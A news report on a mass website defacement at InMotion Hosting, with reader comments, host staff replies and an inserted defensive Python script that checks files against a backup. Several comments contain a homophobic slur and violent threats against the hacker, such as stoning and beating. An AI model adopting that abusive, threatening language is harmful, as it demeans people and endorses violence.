For several hours Sunday morning, Blast Magazine and many other websites in the InMotion Hosting network were attacked by a hacker called TiGER-M@TE.
InMotion, where Blast hosts one of its servers, acknowledged the breach.
“At around 4 a.m. EST, our system administration team identified a website defacement attack affecting a large number of customers. We are still investigating, but it appears that files named index.php have been defaced. We are evaluating how this has occurred and our security team will have more information shortly,” InMotion said in a statement. “While we review this issue, cPanel and SSH access has been disabled on various platforms. For additional security, we are rotating passwords on a number of accounts.”
It is unclear how many sites were hit, but it is likely hundreds, if not thousands.
This morning, the Blast homepage was briefly replaced by a black background with the red letters “Hacked” (See photo below) and all of our blogs and articles were unreachable.
This appears to be the same hacker who successfully attacked Google previously. The Hacker News interviewed TiGER-M@TE, who claimed to have been hacking since 2007, working alone, and using only private exploits and zero-day attacks.
In an online posting, TiGER-M@TE claimed responsibility for launching the homepage defacement attack.
“While we can respect TiGER-M@TE’s abilities, we are disappointed that our websites were hit,” said Blast Magazine editor-in-chief John M. Guilfoil. “What truly concerns me, however, is that InMotion Hosting appeared woefully unable to prevent or defend against this kind of attack, even though homepage defacements have been going on seemingly forever. We will consult with InMotion on Monday and plan to press the company to be more proactive in its security if InMotion values its customers.”
Good post.
InMotion and Web Hosting Hub are sister companies, of which we are a client.
I’m surprised there’s no response from them on twitter.
I too got that email from them, after putting in a support ticket.
I’m going to get them on the phone right now and press for more information as well.
Over 700,000 sites got hit by Tiger-Mate; he’s from Bangladesh or India, and he did it for fun. InMotion has restored about 60% of the sites and is still working on all of them. They have been tweeting on Twitter with responses; they are busy restoring sites.
For fun… he’d just increased the cost of doing business in web.
He probably did not realize this, but he just earned negative karma from half a million people, all in the name of fun? Good luck, and hope he does not get hit by the satellite on his way out.
Good luck getting them on the phone:)
I imagine they’ve got everyone in there, on a Sunday, fixing things for the 95% of people who have no clue about managing a server.
I’m assuming that a lot of people would be interested in a more proactive approach to security. It would be great if we could organize this conversation in a forum somewhere rather than have 1000 people call them up and ask them the same question.
While it was not as widespread or publicized, there was a defacement attack at inmotionhosting about 4 months ago. You have to appreciate that a company has to try to maintain some sort of integrity and not say “yup we’re not that secure” but, we can also look at it this way: inmotionhosting has provided decent pricing, support and hosting services ( at least for me for several years ) and would consider them a “strategic partner” in keeping our sites, or our clients sites, up and running.
So, does anyone have any suggestions as to where/how we can have this conversation as a community?
Hi Marco,
I just wanted to touch base and let you know that we do have a specific forum setup for this incident, which you can find here:
http://forum.inmotionhosting.com/viewforum.php?f=57
Our main goal in the forum is to help users fix their sites. We are getting posts where users want to discuss the situation, both good and negative, and we’re approving them all.
Let me know if you have any questions, we’re more than happy to help.
Thanks,
– Brad
I didn’t hear anything, I just saw my speed-dial pic had changed. Too bad they don’t inform customers about data leaks but there’s a reason you never get shell access on cPanel servers.
They recently told me they were unable to upgrade to the (actually supported) 5.3 version of php, I bet it’ll be possible quite soon.
Do you respect these script kiddies?
We work hard to make a living online and these scum bags come and destroy our sites… And you say “respect” them ??
Totally agree with you
This guy tried to hack Google Bangladesh a few months back, and what the heck are the Bangladesh police doing?
Is he so hard to track in such a small country?
Maybe countries like Pakistan and Bangladesh are really supporting the so-called cyber terrorism.
How does someone interview them? If anyone knows who they are, please post here with their info.
I am so done with InMotion Hosting, This is the second time this year that my site has been down because of a hacker. I know people who have NEVER been hacked so twice in one year tells me this group does not know what they are doing!!!
Hi M,
This is Brad with InMotion Hosting.
While I’m not trying to offer any type of excuse, I just want to make sure that readers are aware of the multiple hacks.
The hack this Sunday was targeted at our entire network, and was successful due to a flaw caused by us. This is the first time that this type of issue has occurred within our network.
There are other ways that your site can be hacked, usually through outdated software, which has nothing to do with the security of our servers. For example, if you’re running a version of Joomla from 2 years ago, there have been numerous security patches / updates released by the Joomla Team. Outdated software can make it easier for hackers to compromise your site. Another example: if you’re running a small unknown WordPress plugin that has no/poor security built into it, your site may be compromised. Both of these examples can open your site to hackers because of the software on your account.
I just want everyone to know, however, that InMotion Hosting is here to help. If your site was defaced, please let us know as we are more than happy to help. We also have a forum online specific to this incident that you may find helpful as well:
http://forum.inmotionhosting.com/viewforum.php?f=57
Please let us know if we can help.
Thanks,
– Brad
Actually, we have used InMotion for a number of years and have always found them to be responsive. I agree that it is unfortunate to have had this happen – and I was pretty freaked out when I saw my site this morning – but it didn’t take long to get things back online.
I am, and will continue to be, a satisfied InMotion client.
I’m a Web Hosting Hub member. I just noticed this happened. Just my index page was compromised. There was an added file that was called “hack_page”, and it had in its title “Hacked by TiGER-M@TE”. I didn’t view the file, just the source. So I’m not sure what exactly it had, but I believe there was an audio file.
hack_file is a folder created by InMotion Hosting themselves, where they moved the hacked pages after restoring the website. You can find it on the InMotion Hosting website.
Hi
I too have had my site hacked by this TiGER-M@TE. Is InMotion Hosting restoring the index.php files from backup?
Thanks
Dave
TiGER-M@TE is a F*CKiNG F@GGOT.
I would love to find this guy and smack the back of his head with a metal baseball bat, right into his monitor. And then smash all of his drives, backups, towers, whatever he has. What a loser, this is what you do with your time? Die.
I was hacked and only discovered it by accident. Inmotion Hosting couldn’t even send me an automated email. Nope, they just let it go until I noticed 13 hours after the hack. Do they care if I look like a fool with my clients — like I can’t even keep data secure? Hell, no, they don’t. Inmotion Hosting wanted as few people as possible to know about this so they could fix as much as possible without having to explain it. For those of us damaged by it…well, too bad for us. Bottom line here: they could have sent emails, but they made a strategic choice not to. That’s some cynical and messed up crap!
While I am not in this boat, I do know people that use web pages to help make ends meet.
The person(s) involved in the destruction of these sites never consider what impact it has on others.
Should the real identity of the people be discovered, stone them and let their remains shown as a warning.
Make the punishment harsh enough, and the will to commit the crime will fade away.
This is the second time this year I’ve had some crap happen with my website, which is hosted by InMotion Hosting. I’ve been with them for a couple of years, and was very happy with their services, until now. I am so disappointed that the company failed to notify its customers that there had been a security breach. I am so done with this company, and am moving on.
I have two sites of mine hosted on InMotion; one of them was hacked, but still InMotion has been the best for me in terms of hosting, support and pricing.
Maybe this will just teach them a lesson.
I am happy and will remain an InMotion Hosting customer.
Please — most of you are being too generous regarding your characterization of InMotion Hosting. While the company may have “adequately” served you in the past, in the world of 24/7 biz it is the here & now that matters. InMotion portrays itself as the epitome of web hosting service, and yet it has had **at least** two significant security breaches of its systems within the past six months. Pull back the rug on this company and you’ll see an outgunned IT staff coupled with ineffectual business leadership, all overwhelmed by the apparent runaway success of a small Tech/Hosting start-up. That’s my opinion, and it’s unlikely to change.
My website puts food on my family’s table. Fuck Tiger mate, I would rip his face out if I knew who he was.
I am a web developer and have been for over 9 years. My personal response to this, congrats. I’m glad someone with these kind of abilities only defaced the homepage…. when he could have done so much worse.
Was it wrong? Yeah, but no where near as bad as it could have been.
At least someone is testing the servers for security, right?
And a simple restore of a local or back-up of your index solves the problem right away.
Also, he doesn’t live in Bangladesh, FYI.
“outgunned IT staff coupled with ineffectual business leadership, all overwhelmed by the apparent runaway success of a small Tech/Hosting start-up.”
my sentiments exactly Tim!
This is the text from ‘hacked_page’:
Non-technical savvy users are easily fooled by web hosting companies who falsely explain how far a total compromise could go. Security-minded guys will give you the following conclusions.
1 – InMotion said the goal of this mass hack is just to do defacement.
These hosting guys never know hackers have installed rootkits and backdoors for future access.
They think that it’s safe and simple as restoring clients’ web sites from backups.
Once a box is hacked at the root level, it can’t be trusted any more.
2 – Hackers could have compromised inMotion several weeks/months before. Finally, they’ve become aware that the exploit they use has been discovered/known by other like-minded hackers. They do mass defacement to notify the inMotion guys to patch this hole.
We’ve seen that mass hacking these days is not just for fun and fame. It has been used for generating revenue in black markets. Now, some clients are ready to move to other hosts. Others are just staying at inMotion and hoping for this mass hack not to happen again. Rest assured, this hack will not come back, as hackers may now have future access at their will using backdoors that utilize stealthy covert channels to remotely do malicious stuff.
Stay Secure.
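The comment above argues that restoring defaced index.php files from backup does not show what else changed on the account. As an added example (not part of the original thread and not InMotion's tooling), the sketch below compares a live document root against a known-good backup copy by SHA-256 and reports modified, added and missing files; the directory layout, file names and file bodies are constructed for the demonstration.

```python
import hashlib
import os
import tempfile


def manifest(root):
    """Map each file under root (relative path) to its SHA-256 digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def compare(backup_root, live_root):
    """Diff the live document root against a known-good backup copy."""
    good, live = manifest(backup_root), manifest(live_root)
    return {
        "modified": sorted(p for p in good if p in live and good[p] != live[p]),
        "added": sorted(p for p in live if p not in good),
        "missing": sorted(p for p in good if p not in live),
    }


def write(root, rel, body):
    """Create a file (and its parent directories) with the given text."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(body)


def build_sample():
    """Constructed sample trees; every file name and body here is made up."""
    base = tempfile.mkdtemp(prefix="docroot-demo-")
    backup, live = os.path.join(base, "backup"), os.path.join(base, "live")
    clean = {
        "index.php": "<?php echo 'home'; ?>",
        "blog/index.php": "<?php echo 'blog'; ?>",
        "lib/util.php": "<?php function f() {} ?>",
    }
    for root in (backup, live):
        for rel, body in clean.items():
            write(root, rel, body)
    # Simulated incident: index.php files overwritten, one extra file left behind.
    for rel in ("index.php", "blog/index.php"):
        write(live, rel, "<html><title>defaced (placeholder)</title></html>")
    write(live, "uploads/cache.php", "<?php /* unexpected file */ ?>")
    return backup, live


if __name__ == "__main__":
    report = compare(*build_sample())
    for kind in ("modified", "added", "missing"):
        for path in report[kind]:
            print(f"{kind:9} {path}")
```

A clean diff of the document root says nothing about the host underneath it, which is the commenter's point about root-level compromise; the comparison is only meaningful when the backup predates the incident and the check runs from a system that is itself trusted.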
My site is hosted on InMotion Hosting, and was restored from backup. But how do I remove the cached “site hacked” picture from Google tools and Google site preview?